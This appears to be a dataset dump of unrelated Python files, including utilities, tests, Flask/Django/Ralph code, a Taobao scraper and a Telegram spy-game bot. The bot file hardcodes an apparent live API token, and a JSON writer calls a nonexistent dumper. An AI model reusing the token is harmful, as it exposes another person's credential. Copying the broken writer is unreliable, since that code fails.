clean_location(original_cinema_location)\n print(original_cinema_location, new_cinema_location)\n thread = Thread(target=calculate_distance, args=(cinema.pk, new_cinema_location, location, ))\n thread.start()\n ths.append(thread)\n for th in ths:\n th.join()\n\n print(result)\n return result\n\n # print(cinema_location)\n # calculate_distance(dis=cinema_location)\n\n\n# 对地址进行清洗\ndef clean_location(location):\n \"\"\"\n\n :param location:\n :return:\n \"\"\"\n indexes = [] # 分隔符的索引\n if \"路\" in location:\n indexes.append(location.index(\"路\"))\n\n if \"街\" in location:\n indexes.append(location.index(\"街\"))\n\n if \"广场\" in location:\n indexes.append(location.index(\"广场\")+1)\n\n if indexes:\n return location[:min(indexes)+1]\n else:\n return location\n\n # return location\n\n\nif __name__ == '__main__':\n get_all_cinemas()\n # calculate_distance()calculate_distance","sub_path":"movie/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"299230218","text":"import json\n\n\"\"\"\nReader&Writer for json\n\"\"\"\n\n\nclass JsonRW:\n def __init__(self):\n print('Init')\n\n # read\n @staticmethod\n def read(file_path):\n _data = []\n with open(file_path, 'r') as f:\n _data = json.load(f)\n return _data\n\n # write\n @staticmethod\n def write(file_path, data):\n with open(file_path, \"w\", encoding=\"utf-8\") as f:\n json.dump(data, f, Dumper=json.RoundTripDumper)\n\n\n# main\nif __name__ == '__main__':\n _file_path = r'test/resources/files/data.json'\n result = JsonRW().read(file_path=_file_path)\n print(f'result:{result}')\n","sub_path":"file2file/json_rw.py","file_name":"json_rw.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"95547280","text":"\nfrom app_main import app\nfrom tests import OhmTestCase\n\n\nclass DashboardTest(OhmTestCase):\n def test_dashboard(self):\n with app.test_client() as c:\n response = c.get('/dashboard')\n assert \"Ready to begin assessment\" in response.data\n\n def test_community_response(self):\n with app.test_client() as c:\n response = c.get('/community')\n assert \"Recent Signed Users\" in response.data","sub_path":"tests/pages_tests/dashboard_test.py","file_name":"dashboard_test.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"372788666","text":"import RPi.GPIO as GPIO\nimport time\n\nclass Keypad():\n def __init__(self, debug = False):\n GPIO.setmode(GPIO.BCM)\n\n # Ascending order so R1 is pin 24, R2 is pin 25 etc.\n self._row_pins = [23, 24, 25, 12]\n self._column_pins = [16, 20, 21] \n\n # Simple dict for ease of access\n self._buttons_dict = {\t(23, 16) : 1, \t(23, 20) : 2, \t(23, 21) : 3,\n (24, 16) : 4, \t(24, 20) : 5, \t(24, 21) : 6,\n (25, 16) : 7, \t(25, 20) : 8, \t(25, 21) : 9,\n (12, 16) : '*', \t(12, 20) : 0, \t(12, 21) : '#'}\n\n self._last_pressed = None\n\n # Set up pins\n for rp in self.row_pins:\n GPIO.setup(rp, GPIO.OUT)\n for cp in self.column_pins:\n GPIO.setup(cp, GPIO.IN, pull_up_down = GPIO.PUD_DOWN)\n\n if debug:\n print('Keypad setup succesfull')\n print('Keypad init completing with values:')\n print('Row pins: {:}\\nColumn_pins: {:}\\n'.format(self.row_pins, self.column_pins))\n\n\n # Accessor functions\n @property\n def row_pins(self):\n return self._row_pins\n @property\n def column_pins(self):\n return self._column_pins\n @property\n def buttons_dict(self):\n return self._buttons_dict\n @property\n def last_pressed(self):\n return self._last_pressed\n\n\n # Polls to check if key is being pressed once. Also waits and checks for debouncing.\n def poll(self, debug = False):\n for rp in self.row_pins:\n GPIO.output(rp, GPIO.HIGH)\n for cp in self.column_pins:\n # Doubly nested to check for noise\n if GPIO.input(cp) == GPIO.HIGH:\n time.sleep(.10)\n if GPIO.input(cp) == GPIO.HIGH:\n # Wait until button is released\n while GPIO.input(cp) == GPIO.HIGH:\n time.sleep(.05)\n button_pressed = self.buttons_dict[(rp, cp)]\n GPIO.output(rp, GPIO.LOW)\n if debug:\n print('Button: {:} was pushed. Pin {:}, {:}'.format(button_pressed, rp, cp))\n return button_pressed\n GPIO.output(rp, GPIO.LOW)\n return None\n\n\n# Initiate an object to use\nkeypad = Keypad(True)\n","sub_path":"keypad.py","file_name":"keypad.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"453023003","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom setuptools import setup\n\nimport os, re\n\npath = os.path.join(os.path.dirname(__file__), 'upyun', '__init__.py')\ninit_py = open(path).read()\nVERSION = re.match(\"__version__ = '([^']+)'\", init_py).group(1)\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n scripts= ['scripts/upyun-ft'],\n name = 'upyun-ft',\n version = VERSION,\n url = 'https://geakit.com/dingyan/upyun-ft',\n license = 'BSD',\n description = \"Upyun File Transfer based on Python API\",\n long_description=read('README.rst'),\n author = 'Michael Ding',\n author_email = 'dingyan@{nospam}freestorm.org',\n packages = ['upyun'],\n test_suite = 'tests',\n classifiers = [\n 'Environment :: Console',\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: System Administrators',\n 'License :: License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: System :: Systems Administration :: Authentication/Directory'\n ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"475841583","text":"import abc\nfrom typing import Optional\n\nimport lab as B\nimport numpy as np\nimport stheno\nimport torch\n\n__all__ = [\"GPGenerator\"]\n\n\nclass DataGenerator(metaclass=abc.ABCMeta):\n \"\"\"Data generator.\n\n Args:\n batch_size (int, optional): Batch size. Defaults to 16.\n num_tasks (int, optional): Number of tasks to generate per epoch. Must be an\n integer multiple of `batch_size`. Defaults to 2^14.\n x_range (tuple[float, float], optional): Range of the inputs. Defaults to\n [-2, 2].\n max_train_points (int, optional): Number of training points. Defaults to 50.\n num_test_points (int, optional): Number of testing points. Defaults to 50.\n \"\"\"\n\n def __init__(\n self,\n batch_size=16,\n num_tasks=2 ** 14,\n x_range=(-2, 2),\n max_train_points=50,\n num_test_points=50,\n ):\n self.batch_size = batch_size\n self.num_tasks = num_tasks\n self.num_batches = num_tasks // batch_size\n if self.num_batches * batch_size != num_tasks:\n raise ValueError(\n f\"Number of tasks {num_tasks} must be a multiple of \"\n f\"the batch size {batch_size}.\"\n )\n self.x_range = x_range\n self.max_train_points = max_train_points\n self.num_test_points = num_test_points\n\n @abc.abstractmethod\n def sample(self, x):\n \"\"\"Sample at inputs `x`.\n\n Args:\n x (vector): Inputs to sample at.\n\n Returns:\n vector: Sample at inputs `x`.\n \"\"\"\n\n def generate_batch(self, device: Optional[str] = None):\n \"\"\"Generate a batch.\n\n Args:\n device (str, optional): Name of device.\n\n Returns:\n dict: A task, which is a dictionary with keys `x`, `y`, `x_context`,\n `y_context`, `x_target`, and `y_target.\n \"\"\"\n task = {\n \"x\": [],\n \"y\": [],\n \"x_context\": [],\n \"y_context\": [],\n \"x_target\": [],\n \"y_target\": [],\n }\n\n # Determine number of test and train points.\n num_train_points = np.random.randint(3, self.max_train_points + 1)\n num_test_points = self.num_test_points\n num_points = num_train_points + num_test_points\n\n for i in range(self.batch_size):\n # Sample inputs and outputs.\n lower, upper = self.x_range\n x = lower + np.random.rand(num_points) * (upper - lower)\n y = self.sample(x)\n\n # Determine indices for train and test set.\n inds = np.random.permutation(x.shape[0])\n inds_train = sorted(inds[:num_train_points])\n inds_test = sorted(inds[num_train_points:num_points])\n\n # Record to task.\n task[\"x\"].append(np.sort(x))\n task[\"y\"].append(y[np.argsort(x)])\n task[\"x_context\"].append(x[inds_train])\n task[\"y_context\"].append(y[inds_train])\n task[\"x_target\"].append(x[inds_test])\n task[\"y_target\"].append(y[inds_test])\n\n # Stack batch and move to active device.\n task = {\n k: torch.tensor(\n B.uprank(B.stack(*v, axis=0), rank=3),\n dtype=torch.float32,\n device=device,\n )\n for k, v in task.items()\n }\n\n return task\n\n def epoch(self, device: Optional[str] = None):\n \"\"\"Construct a generator for an epoch.\n\n Args:\n device (str, optional): Name of device.\n\n Returns:\n generator: Generator for an epoch.\n \"\"\"\n return (self.generate_batch(device) for _ in range(self.num_batches))\n\n\nclass GPGenerator(DataGenerator):\n \"\"\"Generate samples from a GP with a given kernel.\n\n Further takes in keyword arguments for :class:`.data.DataGenerator`.\n\n Args:\n kernel (:class:`stheno.Kernel`, optional): Kernel to sample from.\n Defaults to an EQ kernel with length scale `0.25`.\n \"\"\"\n\n def __init__(self, kernel=stheno.EQ().stretch(0.25), **kw_args):\n self.kernel = kernel\n DataGenerator.__init__(self, **kw_args)\n\n def sample(self, x):\n gp = stheno.GP(self.kernel)\n return B.squeeze(gp(x).sample())\n","sub_path":"convcnp/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"326777083","text":"from net.netarch import YoloArchitecture, YoloInferenceModel\n\n\nclass YOLO(object):\n\n def __init__(self):\n self.debug_timings = True\n self.yolo_arch = YoloArchitecture()\n self.model = self.yolo_arch.get_model()\n self.inf_model = YoloInferenceModel(self.model)\n\n def predict(self, frame):\n boxes_labels = self.inf_model.predict(frame)\n boxes = boxes_labels[0]\n labels = boxes_labels[1]\n\n return boxes, labels\n","sub_path":"src/yolo/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"116175596","text":"cities = [\"Shenzhen\", \"Guangzhou\", \"Shanghai\", \"Beijing\"]\nwith open(\"files/cities\", \"w\") as city_file:\n for city in cities:\n print(city, file=city_file)\n\n# cities =[]\n# with open(\"files/cities\",\"r\") as city_file:\n# for city in city_file:\n# cities.append(city.strip('\\n'))\n# print(cities)\n\n# imelda = \"More Mayhem\", \"Imelda May\", \"2011\", (\n# (1, \"Pulling the Rug\"),\n# (2, \"Psycho\"),\n# (3, \"Mayhem\"),\n# (4, \"Kentish Town Waltz\"))\n#\n# with open(\"files/imelda3\", 'w') as imelda_file:\n# print(imelda, file=imelda_file)\n\n# with open(\"files/imelda3\", \"r\") as imelda_file:\n# contents = imelda_file.readline()\n# imelda = eval(contents)\n# print(imelda)\n# title, artist, year, tracks = imelda\n# print(title)\n# print(artist)\n# print(year)\n# print(tracks)\n","sub_path":"IO/writeFile.py","file_name":"writeFile.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"115269940","text":"import re\r\nimport requests\r\n\r\nurl = 'https://s.m.taobao.com/search'\r\npayload = {'q': '锁骨链','s': '1','ie':'utf8'} #字典传递url参数 \r\nfile = open('taobao_test.txt','w',encoding='utf-8')\r\n\r\nfor k in range(0,10): #100次,就是100个页的商品数据\r\n\r\n #payload ['s'] = 44*k+1 #此处改变的url参数为s,s为1时第一页,s为45是第二页,89时第三页以此类推\r\n payload ['s'] = 5*k+1 #m.taobao手机端\r\n resp = requests.get(url, params = payload)\r\n print(resp.url) #打印访问的网址\r\n resp.encoding = 'utf-8' #设置编码\r\n #title = re.findall(r'\"raw_title\":\"([^\"]+)\"',resp.text,re.I) #PC端,正则保存所有raw_title的内容,这个是书名,下面是价格,地址\r\n #price = re.findall(r'\"view_price\":\"([^\"]+)\"',resp.text,re.I) \r\n #loc = re.findall(r'\"item_loc\":\"([^\"]+)\"',resp.text,re.I)\r\n #pay = re.findall(r'\"view_sales\":\"([^\"]+)\"',resp.text,re.I)\r\n #shop = re.findall(r'\"nick\":\"([^\"]+)\"',resp.text,re.I)\r\n mtitle = re.findall(r'\"title\":\"([^\"]+)\"',resp.text,re.I)#标签,下面都是手机端\r\n msold = re.findall(r'\"sold\":\"([^\"]+)\"',resp.text,re.I)#销量\r\n mcommentCount = re.findall(r'\"commentCount\":\"([^\"]+)\"',resp.text,re.I)#累积评价\r\n mnick = re.findall(r'\"nick\":\"([^\"]+)\"',resp.text,re.I)#店铺\r\n mprice = re.findall(r'\"price\":\"([^\"]+)\"',resp.text,re.I)#价钱\r\n mquantity = re.findall(r'\"quantity\":\"([^\"]+)\"',resp.text,re.I)#库存\r\n #x = len(title) #每一页商品的数量\r\n x = len(mtitle) #手机端\r\n for i in range(0,x) : #把列表的数据保存到文件中\r\n #file.write(str(k*44+i+1)+'标题:'+title[i]+'\\n'+'价格:'+price[i]+'\\n'+'地址:'+loc[i]+'\\n销量:'+pay[i]+'\\n店家:'+shop[i]+'\\n\\n')\r\n file.write(str(k*5+i+1)+'标题:'+mtitle[i]+'\\t'+'销量:'+msold[i]+'\\t'+'累计评价:'+mcommentCount[i]+'\\t'+'店铺:'+mnick[i]+'\\t'+'价钱:'+mprice[i]+'\\t'+'库存:'+mquantity[i]+'\\n')\r\n\r\n\r\nfile.close()","sub_path":"python/taobao_test.py","file_name":"taobao_test.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"533588322","text":"import sqlite3\nimport subprocess\nfrom datetime import datetime, timedelta\nfrom pytz import timezone\nfrom make_log import log_exceptions, log_data\nfrom dateutil import parser as date_parser\n\n\ndef ifutc_to_indian(l_time):\n try:\n a = date_parser.parse(l_time)\n b = '%a %d %b %Y %H:%M:%S %z'\n with open('l_time.txt', 'a+') as temp:\n temp.write(l_time+'\\n')\n india = timezone('Asia/Kolkata')\n c = a.astimezone(india)\n sysnow = datetime.now(india)\n if c > sysnow:\n c = a.replace(tzinfo=india)\n temp_t = c.replace(tzinfo=None)\n l_time = c.strftime(b)\n if temp_t > datetime.now():\n log_data(msg='l_time greater than cur time.',l_time=l_time, now_time=str(datetime.now()))\n elif temp_t < datetime.now()-timedelta(seconds=900):\n log_data(msg='l_time less than (curtime-15min).', l_time=l_time, now_time=str(datetime.now()))\n return l_time\n except Exception as e:\n log_exceptions()\n print(e)\n return l_time\n\ndef time_fun_two(l_time):\n try:\n format = \"%d/%m/%Y %H:%M:%S\"\n a = datetime.strptime(l_time, format)\n sysnow = datetime.now()\n if a < sysnow - timedelta(seconds=500):\n a = sysnow\n l_time = a.strftime(format)\n return l_time\n except Exception as e:\n log_exceptions()\n print(e)\n return l_time\n\nif __name__ == \"__main__\":\n l_time = 'Wed, 17 Sep 2020 08:53:24 +0530'\n a = ifutc_to_indian(l_time)\n b = time_fun_two(\"22/09/2020 08:53:24\")\n pass","sub_path":"cust_time_functs.py","file_name":"cust_time_functs.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"117327397","text":"# -*- coding: utf-8 -*-\nfrom django import forms\nfrom django.core.urlresolvers import reverse\nfrom rest_framework import serializers, status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom ralph.api import RalphReadOnlyAPIViewSet\nfrom ralph.api.fields import ModelMultipleChoiceField\nfrom ralph.lib.mixins.api import ChoiceFieldWithOtherOptionField\nfrom ralph.lib.mixins.forms import ChoiceFieldWithOtherOption\nfrom ralph.lib.transitions.api.serializers import (\n TransitionActionSerializer,\n TransitionJobSerializer,\n TransitionModelSerializer,\n TransitionSerializer\n)\nfrom ralph.lib.transitions.models import (\n Action,\n run_transition,\n Transition,\n TransitionJob,\n TransitionModel\n)\nfrom ralph.lib.transitions.views import collect_actions\n\nFIELD_MAP = {\n forms.CharField: (serializers.CharField, [\n 'max_length', 'initial', 'required'\n ]),\n forms.BooleanField: (serializers.BooleanField, ['initial', 'required']),\n forms.URLField: (serializers.URLField, ['initial', 'required']),\n forms.IntegerField: (serializers.IntegerField, ['initial', 'required']),\n forms.DecimalField: (serializers.DecimalField, ['initial', 'required']),\n forms.DateField: (serializers.DateField, ['initial', 'required']),\n forms.DateTimeField: (serializers.DateTimeField, ['initial', 'required']),\n forms.TimeField: (serializers.TimeField, ['initial', 'required']),\n forms.ModelMultipleChoiceField: (ModelMultipleChoiceField, [\n 'initial', 'required', 'choices'\n ]),\n forms.ModelChoiceField: (serializers.ChoiceField, [\n 'initial', 'required', 'choices'\n ]),\n forms.ChoiceField: (serializers.ChoiceField, [\n 'initial', 'required', 'choices'\n ]),\n ChoiceFieldWithOtherOption: (ChoiceFieldWithOtherOptionField, [\n 'initial', 'required', 'choices', 'auto_other_choice',\n 'other_option_label'\n ])\n}\n\n\nclass TransitionJobViewSet(RalphReadOnlyAPIViewSet):\n queryset = TransitionJob.objects.all()\n serializer_class = TransitionJobSerializer\n\n\nclass TransitionModelViewSet(RalphReadOnlyAPIViewSet):\n queryset = TransitionModel.objects.all()\n serializer_class = TransitionModelSerializer\n\n\nclass TransitionActionViewSet(RalphReadOnlyAPIViewSet):\n queryset = Action.objects.all()\n serializer_class = TransitionActionSerializer\n\n\nclass TransitionViewSet(RalphReadOnlyAPIViewSet):\n queryset = Transition.objects.all()\n serializer_class = TransitionSerializer\n prefetch_related = ['actions']\n\n\nclass TransitionView(APIView):\n\n def dispatch(self, request, transition_pk, obj_pk, *args, **kwargs):\n self.transition = Transition.objects.get(\n pk=transition_pk\n )\n self.obj = self.transition.model.content_type.get_object_for_this_type(\n pk=obj_pk\n )\n self.objects = [self.obj]\n self.actions, self.return_attachment = collect_actions(\n self.obj, self.transition\n )\n return super().dispatch(request, *args, **kwargs)\n\n def get_fields(self):\n fields = {}\n fields_name_map = {}\n for action in self.actions:\n action_fields = getattr(action, 'form_fields', {})\n for name, options in action_fields.items():\n # TODO: unify this with\n # TransitionViewMixin.form_fields_from_actions\n condition = options.get('condition', lambda x, y: True)\n if not condition(self.obj, self.actions):\n continue\n field_class, field_attr = FIELD_MAP.get(\n options['field'].__class__, None\n )\n attrs = {\n name: getattr(\n options['field'], name, None\n ) for name in field_attr\n }\n choices = options.get('choices')\n if choices:\n if callable(choices):\n list_of_choices = choices(self.actions, self.objects)\n else:\n list_of_choices = choices.copy()\n attrs['choices'] = list_of_choices\n fields_name_map[name] = '{}__{}'.format(action.__name__, name)\n fields[name] = field_class(**attrs)\n return fields, fields_name_map\n\n def get_serializer_class(self):\n class_name = 'TransitionSerializer{}'.format(\n self.obj.__class__.__name__\n )\n class_attrs, _ = self.get_fields()\n serializer_class = type(\n class_name, (serializers.Serializer,), class_attrs\n )\n\n return serializer_class\n\n def get_serializer(self, only_class=False):\n return self.get_serializer_class()()\n\n def add_function_name_to_data(self, data):\n result = {}\n _, fields_name_map = self.get_fields()\n for k, v in data.items():\n result[fields_name_map.get(k)] = v\n return result\n\n def post(self, request, *args, **kwargs):\n serializer = self.get_serializer_class()(data=request.data)\n serializer.is_valid(raise_exception=True)\n result = {}\n data = self.add_function_name_to_data(serializer.validated_data)\n transition_result = run_transition(\n self.objects,\n self.transition,\n self.transition.model.field_name,\n data,\n request=request\n )\n status_code = status.HTTP_201_CREATED\n if self.transition.is_async:\n result['job_ids'] = [\n reverse('transitionjob-detail', args=(i,))\n for i in transition_result\n ]\n status_code = status.HTTP_202_ACCEPTED\n return Response(result, status=status_code)\n","sub_path":"src/ralph/lib/transitions/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"274242715","text":"import logging\nimport os\n\nfrom preprocess.parsers import pdb_parser\n\n\nclass Loader:\n def __init__(self, filepath):\n assert isinstance(filepath, str) and os.path.isfile(filepath)\n self.filepath = filepath\n\n def _load_file(self, filepath):\n with open(filepath) as file:\n lines = [line for line in file]\n return lines\n\n def _load_parser(self, parser_name):\n assert isinstance(parser_name, str)\n if hasattr(pdb_parser, parser_name):\n parser = getattr(pdb_parser, parser_name)\n assert issubclass(parser, pdb_parser.BaseParser), \\\n f\"{parser_name} is not a parser in module pdb_parser\"\n else:\n logging.error(f\"{parser_name} is not in module pdb_parser\")\n raise Exception\n return parser\n\n def parse_with(self, parsername):\n parser = self._load_parser(parsername)\n if parsername == 'HbondParser':\n loaded_parser = parser(self.filepath)\n else:\n filelines = self._load_file(self.filepath)\n loaded_parser = parser(filelines)\n parsed = loaded_parser.parsed\n return parsed\n","sub_path":"src/preprocess/parsers/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"134103367","text":"from django.db import models\n# Create your models here.\nclass Appointment(models.Model):\n your_name= models.CharField(max_length=40,verbose_name=\"Enter Your Full Name\")\n your_phone=models.CharField(max_length=17,verbose_name=\"Telephone Number ex: +90 111 222 33 44\")\n your_mail=models.EmailField(verbose_name=\"Enter Your Email\")\n your_address=models.CharField(max_length=40,verbose_name=\"Enter Your Address\")\n schedule_date = [\n ('Choose Your Scheldule', 'Choose Your Scheldule'),\n ('9 AM to 10 AM', '9 AM to 10 AM'),\n ('10 AM to 11 AM', '10 AM to 11 AM'),\n ('11 AM to 12 PM', '11 AM to 12 PM'),\n ('1 PM to 2 PM', '1 PM to 2 PM'),\n ('2 PM to 3 PM', '2 PM to 3 PM'),\n ('3 PM to 4 PM', '3 PM to 4 PM'),\n ('4 PM to 5 PM', '4 PM to 5 PM'),\n ]\n schedule_dates=models.CharField(\n max_length=40,\n choices=schedule_date,\n default='Choose Your Scheldule',\n )\n your_messagess=models.TextField(verbose_name=\"Enter Your Message\")\n Schedule_Days = [\n ('Choose Your Day', 'Choose Your Day'),\n ('Sunday', 'Sunday'),\n ('Monday', 'Monday'),\n ('Tuesday', 'Tuesday'),\n ('Wednesday', 'Wednesday'),\n ('Thursday', 'Thursday'),\n ('Friday', 'Friday'),\n ('Saturday', 'Saturday'), \n ]\n schedule_days = models.CharField(\n max_length=35,\n choices=Schedule_Days,\n default='Choose Your Scheldule Day',\n )\n time_stamp=models.DateTimeField(auto_now_add=True)\nclass Contact(models.Model):\n your_name = models.CharField(max_length=40,verbose_name=\"Enter Your Name\")\n your_mail = models.EmailField(verbose_name=\"Enter Your Mail\")\n your_messagess = models.TextField(verbose_name=\"Enter Your Message\")\n time_stamp=models.DateTimeField(auto_now_add=True)\n\n","sub_path":"website/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"240232944","text":"# -*- coding: utf-8 -*-\nimport logging\nfrom logging.handlers import TimedRotatingFileHandler\n\nfrom flask import Flask\nfrom flask_bootstrap import Bootstrap\nfrom flask_login import LoginManager\nfrom flask_sqlalchemy import SQLAlchemy\n\n\nlogin_manager = LoginManager()\nbootstrap = Bootstrap()\n#建立ORM\ndb = SQLAlchemy()\n\n#初始化login之前需要调用装饰器返回User表记录对象,用于登陆状态判断\ndef init_login(app):\n login_manager.init_app(app)\n login_manager.login_view = \"login\"\n @login_manager.user_loader\n def load_user(user_id):\n from models import User\n return db.session.query(User).get(user_id)\n\n#设置日志\nlogger = logging.getLogger('root')\nlogger.setLevel(logging.NOTSET)\nfmt = '%(levelname)s %(asctime)s - %(filename)s:%(funcName)s:[%(lineno)s] - %(message)s'\ndatefmt = '%Y-%m-%d %H:%M:%S'\n\n#输出到文件\nth = TimedRotatingFileHandler('app.log', when='D', interval=1, backupCount=1)\nth.setFormatter(logging.Formatter(fmt, datefmt))\n\n#输出到屏幕\nch = logging.StreamHandler()\nch.setFormatter(logging.Formatter(fmt, datefmt))\n\nlogger.addHandler(th)\nlogger.addHandler(ch)\n\ndef create_app():\n app = Flask(__name__,instance_relative_config=True)\n\n #加载普通配置\n app.config.from_object('config')\n #加载特殊配置,会在instance/目录下查找该文件\n app.config.from_pyfile('config.py')\n\n #加载蓝图\n from .api import api\n app.register_blueprint(api, url_prefix='/api/v1_0')\n\n #初始化bootstrap\n bootstrap.init_app(app)\n\n #初始化flask-login\n init_login(app)\n\n #初始化db\n db.init_app(app)\n\n from models import *\n\n return app\n\n\n","sub_path":"zgh/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"487559966","text":"import random\nimport threading\n\nfrom telebot import TeleBot, types\n\nfrom config import creator\n\nbot = TeleBot('896522792:AAFj8eEFqAn68K3YZkJe9aDwQC9Xj3tEZ-c')\n\ngames = dict()\nroles = {'general': {'cabinet': 300,\n 'actions': ['hear', 'see', 'go_to_cabinet', 'nothing', 'arrest'],\n 'desc': '👨🏻‍✈️Ты генерал. Ты не можешь быть шпионом. Найди его! Твой кабинет: 300.',\n 'spy': '',\n 'no_spy': '',\n 'al': 3\n },\n\n 'secretar': {'cabinet': 200,\n 'actions': ['hear', 'see', 'steal_a_card', 'go_to_cabinet', 'nothing'],\n 'desc': '👨🏼‍💻Ты секретарь. Ты слышишь все, т.к сидишь на месте секретаря. Твой кабинет: 200.',\n 'spy': '\\n\\nТы шпион! Слушай все что происходит в здании и ищи коды, которые спрятал генерал!',\n 'no_spy': '\\n\\nТы не шпион, но если узнаешь кто это - донеси генералу!',\n 'al': 2\n },\n 'cleaner': {'cabinet': 100,\n 'actions': ['hear', 'see', 'steal_a_card', 'go_to_cabinet', 'nothing'],\n 'desc': '👩🏻🧹Ты просто уборщица. У тебя нет способностей.( Твой кабинет (если это можно назвать кабинетом): 100',\n 'spy': '\\n\\nТы шпион! Убирайся в здании и незаметно ищи коды, которые спрятал генерал!',\n 'no_spy': '\\n\\nТы не шпион, но если узнаешь кто это - донеси генералу! Хотя ты не любимчик генерала, вряд ли тебе кто поверит.',\n 'al': 1\n },\n\n }\nrusificate = {\n 'general': '👨🏻‍✈️Генерал',\n 'secretar': '👨🏼‍💻Секретарь',\n 'cleaner': '👩🏻🧹Уборщица',\n 'hear': 'Слушать',\n 'see': 'Подсматривать',\n 'steal_a_key': 'Украсть ключ',\n 'go_to_cabinet': 'Прогулятся',\n 'nothing': 'Отдыхать',\n 'arrest': 'Аррестовать',\n 'steal_a_card': 'Украсть AL'\n}\nemojize = {\n 'general': '👨🏻‍✈️',\n 'secretar': '👨🏼‍💻',\n 'cleaner': '👩🏻🧹'\n}\nrolelist = ['general', 'secretar', 'cleaner']\n\n\n@bot.message_handler(commands=['newgame'])\ndef game(m):\n if m.from_user.id != creator:\n return\n games[m.chat.id] = creategame()\n kb = types.InlineKeyboardMarkup()\n kb.add(types.InlineKeyboardButton('Присоеденится',\n url='t.me/' + bot.get_me().username + '?start={}'.format(m.chat.id)))\n bot.send_message(m.chat.id, 'Начался подбор в игру! для регистрации нажмите на кнопку ниже...', reply_markup=kb)\n\n\n@bot.message_handler(commands=['start'], func=lambda m: m.chat.type == 'private')\ndef start(m):\n game_id = int(m.text.split()[1])\n game_exists = False\n for i in games.keys():\n if game_id == i:\n game_exists = True\n break\n if not game_exists:\n return\n if len(games[game_id]['players']) > 3:\n bot.send_message(m.chat.id, 'Вы не можете присоединится! Достигнуто маскимальное кол-во игроков.')\n return\n if m.from_user.id in games[game_id]['users']:\n bot.send_message(m.chat.id, 'Вы уже в игре!')\n return\n if games[game_id]['active']:\n bot.send_message(m.chat.id, 'Игра уже началась!')\n return\n temp_roles = games[game_id]['roles']\n try:\n temp_role = rolelist[len(temp_roles)]\n except:\n bot.send_message(m.chat.id, 'Вы не можете присоединится! Достигнуто маскимальное кол-во игроков.')\n return\n if temp_role != 'general' and games[game_id]['spy'] is None:\n spy = random.choice([True, False])\n games[game_id]['spy'] = m.from_user.id\n else:\n spy = False\n games[game_id]['players'].append(createuser(temp_role, m.from_user.id, m.from_user.first_name, spy))\n games[game_id]['roles'].append(temp_role)\n games[game_id]['users'].append(m.from_user.id)\n bot.send_message(m.chat.id, 'Вы присоеденились к игре.')\n bot.send_message(game_id, rusificate[temp_role] + ' ' + m.from_user.first_name + ' присоединился к игре!')\n\n\n@bot.message_handler(commands=['debug'])\ndef debuj(m):\n if m.from_user.id == creator:\n bot.send_message(m.chat.id, str(games).replace('{', '\\n{\\n').replace('}', '\\n}\\n'))\n\n\n@bot.message_handler(commands=['пудж'])\ndef addplayer(m):\n if m.from_user.id != creator:\n return\n try:\n chat = m.chat.id\n except:\n return\n if len(games[chat]['players']) > 3:\n bot.send_message(m.chat.id, 'Он не может присоединится! Достигнуто маскимальное кол-во игроков.')\n return\n if m.reply_to_message.from_user.id in games[chat]['users']:\n bot.send_message(m.chat.id, 'Он уже в игре!')\n # return\n if games[chat]['active']:\n bot.send_message(m.chat.id, 'Игра уже началась!')\n return\n temp_roles = games[chat]['roles']\n try:\n temp_role = rolelist[len(temp_roles)]\n except:\n bot.send_message(m.chat.id, 'Он не можете присоединится! Достигнуто маскимальное кол-во игроков.')\n temp_role = 'None'\n if temp_role != 'general' and games[chat]['spy'] is None:\n spy = random.choice([True, False])\n games[chat]['spy'] = m.reply_to_message.from_user.id\n else:\n spy = False\n games[chat]['players'].append(\n createuser(temp_role, m.reply_to_message.from_user.id, m.reply_to_message.from_user.first_name))\n games[chat]['roles'].append(temp_role)\n games[chat]['users'].append(m.reply_to_message.from_user.id)\n bot.send_message(chat,\n rusificate[temp_role] + ' ' + m.reply_to_message.from_user.first_name + ' присоединился к игре!')\n\n\n@bot.message_handler(commands=['kick'])\ndef addplayer(m):\n if m.from_user.id != creator:\n return\n game_id = m.chat.id\n chat = game_id\n if m.reply_to_message.from_user.id not in games[chat]['users']:\n bot.send_message(m.chat.id, 'Он еще не в 